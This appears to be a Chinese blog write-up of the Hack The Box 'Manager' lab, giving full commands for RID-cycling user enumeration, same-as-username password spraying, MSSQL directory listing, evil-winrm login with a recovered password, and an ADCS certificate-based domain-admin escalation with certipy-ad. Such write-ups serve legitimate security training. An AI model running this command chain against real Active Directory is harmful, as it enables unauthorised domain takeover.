HTB-M-Manager
HTB-M-Manager
- RID攻击
- ADCS提权
扫扫
先扫一波,有web服务就去看看
测试一下功能点
貌似没xss
扫扫ldap端口
,没有连接不让扫
扫扫smb
这种需要身份验证,但是假用户也能得到部分验证
可以尝试
RID 循环攻击
1 | impacket-lookupsid dll@manager.htb -no-pass |
输出中 : 前的数字是 RID
直接提取用户
1 | | grep SidTypeUser | cut -d' ' -f2 | cut -d'\' -f2 | tr '[:upper:]' '[:lower:]' | tee users |
可以以使用netexec
1 | netexec smb 10.10.11.236 -u guest -p '' --rid-brute |
之后测试一下那个有没有用户名账号密码一样的
1 | netexec smb manager.htb -u users -p users --continue-on-success --no-brute |
然后试探一手
sql
xp_dirtree C:\inetpub\wwwroot
能写出目录的文件,然后就是去wget下来,因为在web目录
1 | evil-winrm -i manager.htb -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' |
ADCS提权
1 | certipy-ad find -dc-ip 10.10.11.236 -ns 10.10.11.236 -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -vulnerable -stdout |
查找容易受攻击的模块
我先是尝试了手动进行ADCS提权,但是我失败了,因为这个
必须非常快速地连续执行
1
利用管理CA权限来给Raven管理证书的权限
1 | certipy-ad ca -ca manager-DC01-CA -add-officer raven -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' |
2
用模板申请证书
1 | certipy-ad req -ca manager-DC01-CA -target dc01.manager.htb -template SubCA -upn administrator@manager.htb -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' |
3
使用管理证书和管理CA权限
1 | certipy-ad req -ca manager-DC01-CA -target dc01.manager.htb -retrieve 23 -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' |
4
申城可利用的pfx
1 | certipy-ad req -ca manager-DC01-CA -target dc01.manager.htb -retrieve 13 -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' |
5
利用
1 | ntpdate 10.10.11.236 && certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.236 |
参考
All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.
Comments